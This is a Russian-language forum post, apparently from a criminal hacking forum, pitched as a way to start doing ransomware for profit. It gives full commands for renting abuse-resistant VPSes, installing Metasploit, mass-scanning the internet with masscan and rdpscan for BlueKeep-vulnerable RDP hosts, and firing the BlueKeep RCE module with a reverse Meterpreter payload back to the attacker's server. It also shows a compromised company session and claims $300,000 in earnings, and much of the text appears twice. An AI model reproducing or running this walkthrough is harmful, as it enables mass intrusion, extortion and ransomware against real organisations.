Пожалуйста, обратите внимание, что пользователь заблокирован
Как заработать от 1к до 100к баксов за месяц почти без вложений?
Привет коммуннити! Сегодня я расскажу вам как стать рансомварщиками, практически без вложений.
Мы будем добывать точки входа в мелкие и средние компании, при помощи metasploit при этом вложив 100 баксов в покупку лишь 2 х vps
Что нужно:
2 vps сервера на Ubuntu (желательно абузоустойчивые топовая конфигурация будет не нужна поэтому 100 баксов вам должно хватить)
PS вы можете взять любую другую OS я буду описывать настройку именно на убунту
Intro первоначальная настройка впс для работы с метой
У нас есть чистая ubuntu
нактим xrdp + xfce оболочку (мне так удобней вы можете взамидействоать с сервером п ssh)
Обновим пакеты
Накатим xrdp для работы через терминальные сессии
Установим облочку xfce можно поставить mate например (но стабильней всего с терминальным серверовм работает именно xfce)
Разрешим xrdp исользовать эту оболчку
Включаем xrpd
Сорян ошибки граматики пунктуации и синтаксиса писал на колонке ничего не редактируя, если кто то захочет дополнить или записать видео по этой теме закину 50-100 баксов для мотивации)
Done теперь вы можете работать с сервером через терминальную сессию
поставим удобный текстовый редактор gedit
Поставим htop для мониторинга загруженности системы
Установка metasploit, БД к нему подтягивать не будем она не понадобиться
качаем метасплойт курлом или wget
даем права chmod 755 msfinstall
Теперь при наборе msfconsole в шелле метасплойт запуститься.
II выбор RCE и подготовка материала
Добывать свой хлеб мы будем данной уязвимостью
xttps://en.wikipedia.org/wiki/BlueKeep
в метасплойте есть rce для него
Данное rce для протокола rdp оно крайне не стабильно, но приносит хорошие доступы)
С RCE мы определились
теперь нам нужен материал, то есть уязвимые машины в клирнете под блюкип
В идеале если у вас будут подсети с maxmaind и софт для пентеста от z668, он нужен исключительно для чека на RDP сервис дабы не тратить время и пропускать порты все что не относиться к рдп
лучше всего сканировать рандомные TCP порты и потом проверять их на сервис рдп
Я покажу на примере стандандартного 3389 порта
Установим еще 2 софта для сканирования портов (masscan) и rdpscan для проверку на узвимый bluekeep
ставим все не обходимое для работы масскана
затягиваем сорсы к себе
переходим в каталог с массканом cd masscan
собираем в многопотоке
Качаем бесплатно либо покупаем депы IP адресов
данные параметры возьмут депы из фаила res4.txt просканируют порт 3389 с рейтом 100 000 исключая 255.255.255.255 подсеть
выдаст чистые результаты IP с output фаила масскана
Ставим сканер на уязвимость блюкип и все необходимо для его работы
компилируем
Запуск сканера
--workers 500 (количество воркеров стоит отписальное количество зависит от вашей конфигурации сервера )
--port 3389 порт который сканируем
--file /root/rdpscan/ch2.txt путь до фаила с ипами
grep 'VULN' выбираем только уязвимые и записываем в фаил >results.txt
III получаем доступы
Я буду использовать стандартный пейлоад метасплойта для закрепления, можно ипользовать кобальт страйк или любую другую систему пост эксплуатации но статья расчитана на тех у кого нет нихуя даже кряка, будем использовать метерперетер
и так запускаем метасплойт
И сразу открываем второе окно терминала и там опять запускаем метасплойт
В первом окне делаем handler (туда будут лететь сессии отдельным окном)
EXITFUNC есть 3 разных значения: thread, process, seh
мы используем thread он используеться почти везде и работает достаточно хорошо
запускает шелл-код в подпотоке, и выход из этого потока приводит к рабочему приложению / системе.
хэндлер готов и ожидает коннектов
переходим во второе окно
Bluekeep
set LHOST ип впс
через какое то время в хендлер полетят сесии
Вам остается только закрепляться и отбирать доступы)
Enjoy
c Апреля по по Июль я заработал блюкипом около 300.000 USD чистыми деньгами, таким способом можно поймать
компании с ревеню до 100 миллонов,
тем самым поучиться пентесту не покупая мат, в этой теме вы можете задавать вопросы
Привет коммуннити! Сегодня я расскажу вам как стать рансомварщиками, практически без вложений.
Мы будем добывать точки входа в мелкие и средние компании, при помощи metasploit при этом вложив 100 баксов в покупку лишь 2 х vps
Что нужно:
2 vps сервера на Ubuntu (желательно абузоустойчивые топовая конфигурация будет не нужна поэтому 100 баксов вам должно хватить)
PS вы можете взять любую другую OS я буду описывать настройку именно на убунту
Intro первоначальная настройка впс для работы с метой
У нас есть чистая ubuntu
нактим xrdp + xfce оболочку (мне так удобней вы можете взамидействоать с сервером п ssh)
Обновим пакеты
sudo apt-get updateНакатим xrdp для работы через терминальные сессии
sudo apt-get install xrdpУстановим облочку xfce можно поставить mate например (но стабильней всего с терминальным серверовм работает именно xfce)
sudo apt-get install xfce4 xfce4-terminalРазрешим xrdp исользовать эту оболчку
sudo sed -i.bak '/fi/a #xrdp multiple users configuration n xfce-session n' /etc/xrdp/startwm.shВключаем xrpd
Сорян ошибки граматики пунктуации и синтаксиса писал на колонке ничего не редактируя, если кто то захочет дополнить или записать видео по этой теме закину 50-100 баксов для мотивации)
sudo systemctl enable xrdpDone теперь вы можете работать с сервером через терминальную сессию
поставим удобный текстовый редактор gedit
sudo apt-get install gedit Поставим htop для мониторинга загруженности системы
sudo apt-get install htopУстановка metasploit, БД к нему подтягивать не будем она не понадобиться
качаем метасплойт курлом или wget
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstallдаем права chmod 755 msfinstall
sudo ./msfinstallТеперь при наборе msfconsole в шелле метасплойт запуститься.
II выбор RCE и подготовка материала
Добывать свой хлеб мы будем данной уязвимостью
xttps://en.wikipedia.org/wiki/BlueKeep
в метасплойте есть rce для него
exploit/windows/rdp/cve_2019_0708_bluekeep_rceДанное rce для протокола rdp оно крайне не стабильно, но приносит хорошие доступы)
С RCE мы определились
теперь нам нужен материал, то есть уязвимые машины в клирнете под блюкип
В идеале если у вас будут подсети с maxmaind и софт для пентеста от z668, он нужен исключительно для чека на RDP сервис дабы не тратить время и пропускать порты все что не относиться к рдп
лучше всего сканировать рандомные TCP порты и потом проверять их на сервис рдп
Я покажу на примере стандандартного 3389 порта
Установим еще 2 софта для сканирования портов (masscan) и rdpscan для проверку на узвимый bluekeep
ставим все не обходимое для работы масскана
sudo apt-get install git gcc make libpcap-devзатягиваем сорсы к себе
git clone https://github.com/robertdavidgraham/masscanпереходим в каталог с массканом cd masscan
собираем в многопотоке
make -jКачаем бесплатно либо покупаем депы IP адресов
masscan -iL ip.txt -oL res4.txt -p 3389 --rate 100000 --exclude 255.255.255.255данные параметры возьмут депы из фаила res4.txt просканируют порт 3389 с рейтом 100 000 исключая 255.255.255.255 подсеть
awk '{ print $4,$3 }' OFS=":" res4.txt > 4433.txtвыдаст чистые результаты IP с output фаила масскана
Ставим сканер на уязвимость блюкип и все необходимо для его работы
sudo apt-get install libssl-dev
sudo apt-get install build-essentialgit clone https://github.com/robertdavidgraham/rdpscan.gitcd /rdpscan/компилируем
make -jЗапуск сканера
./rdpscan --workers 500 --port 3389 --file /root/rdpscan/ch2.txt grep 'VULN' | cut -f1 -d'-' >results.txt--workers 500 (количество воркеров стоит отписальное количество зависит от вашей конфигурации сервера )
--port 3389 порт который сканируем
--file /root/rdpscan/ch2.txt путь до фаила с ипами
grep 'VULN' выбираем только уязвимые и записываем в фаил >results.txt
III получаем доступы
Я буду использовать стандартный пейлоад метасплойта для закрепления, можно ипользовать кобальт страйк или любую другую систему пост эксплуатации но статья расчитана на тех у кого нет нихуя даже кряка, будем использовать метерперетер
и так запускаем метасплойт
msfconsoleИ сразу открываем второе окно терминала и там опять запускаем метасплойт
В первом окне делаем handler (туда будут лететь сессии отдельным окном)
use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcp_rc4 (выбираем пелоад реверс (когда цель подключаеться к нам) с шифрованием )set EXITFUNC threadEXITFUNC есть 3 разных значения: thread, process, seh
мы используем thread он используеться почти везде и работает достаточно хорошо
запускает шелл-код в подпотоке, и выход из этого потока приводит к рабочему приложению / системе.
set LHOST хост нашей впсset LPORT порт где будет висит слушательset RC4PASSWORD PASSS ( пароль для RC4)set ExitOnSession 0 (данный параметр будет держать сессию всегда онлайн (тоесть не будет слипа может привести к быстрому спаливанию))setg SessionLogging y включить логированиеsetg loglevel 1 уровень логированияrun -j запускхэндлер готов и ожидает коннектов
переходим во второе окно
Bluekeep
use exploit/windows/rdp/cve_2019_0708_bluekeep_rceset payload windows/x64/meterpreter/reverse_tcp_rc4set EXITFUNC threadset DisablePayloadHandler 1 (обязтаельно 1 что бы сесия летела в отдельное окно)set LHOST ип впс
set LPORT порт (указывать такой же как и в хэндлере)set RC4PASSWORD PASSS (пароль такой же как в хэндлере)set ConnectTimeout 5 (таймаут)set GROOMSIZE 100 (количество мегабайт которыми будет заспамливаться хост играйтесь с парметрами от 100 до 250 ) всегда будут прилетать разные машиныset GROOMCHANNELCOUNT 1set forceexploit 1 исполнять принудетельноset target 1 (дефолтный таргет тут менять ничего не нужно )set rhosts file:/root/rdpscan/4.txt (путь до фаила с уязмимыми машинами)set RPORT (если вы используете не старндартый порт для RDP если 3389 то его можно не указывать он стоит по дефолту)run - запускчерез какое то время в хендлер полетят сесии
Computer : V-RDS-01
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_GB
Domain : BROWNHILLS
Logged On Users : 41
Meterpreter : x64/windowsВам остается только закрепляться и отбирать доступы)
Enjoy
c Апреля по по Июль я заработал блюкипом около 300.000 USD чистыми деньгами, таким способом можно поймать
компании с ревеню до 100 миллонов,
тем самым поучиться пентесту не покупая мат, в этой теме вы можете задавать вопросы
Последнее редактирование: